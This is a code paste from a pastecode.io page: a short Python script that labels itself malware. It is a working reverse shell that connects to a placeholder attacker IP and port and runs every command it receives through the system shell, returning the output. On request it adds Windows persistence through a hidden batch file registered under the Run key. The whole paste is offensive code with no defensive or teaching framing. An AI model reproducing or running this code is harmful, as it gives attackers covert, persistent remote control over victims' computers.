Untitled

mail@pastecode.io avatar
unknown
plain_text
a month ago
1.9 kB
1
Indexable
Never
import subprocess
import socket
import os

def hide_file(file_path):
    # Hides the file by setting the hidden attribute
    if os.name == 'nt':  # Windows OS
        subprocess.call(['attrib', '+h', file_path])
    elif os.name == 'posix':  # Linux/Unix OS
        subprocess.call(['chflags', 'hidden', file_path])

def persistence():
    # Adds persistence to the malware by creating a registry key
    if os.name == 'nt':  # Windows OS
        with open(os.path.join(os.environ['APPDATA'], 'Malware.bat'), 'w') as bat_file:
            bat_file.write('START pythonw.exe {} & exit'.format(os.path.abspath(__file__)))
        subprocess.call(['reg', 'add', 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run', '/v', 'Malware', '/t', 'REG_SZ', '/d', os.path.join(os.environ['APPDATA'], 'Malware.bat'), '/f'])
        hide_file(os.path.join(os.environ['APPDATA'], 'Malware.bat'))

def connect():
    # Modify the following IP and port to your listening server
    attacker_ip = 'YOUR_ATTACKER_IP'
    attacker_port = YOUR_ATTACKER_PORT

    # Create a socket connection to the attacker
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((attacker_ip, attacker_port))

    # Execute commands received from the attacker
    while True:
        command = s.recv(1024).decode()
        if command.lower() == 'exit':
            break
        elif command.lower() == 'persistence':
            persistence()
            s.send('Persistence achieved!'.encode())
        else:
            cmd_output = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            output_bytes = cmd_output.stdout.read() + cmd_output.stderr.read()
            output_str = output_bytes.decode('utf-8', 'ignore')
            s.send(output_str.encode())

    # Close the connection
    s.close()

if __name__ == '__main__':
    connect()
Leave a Comment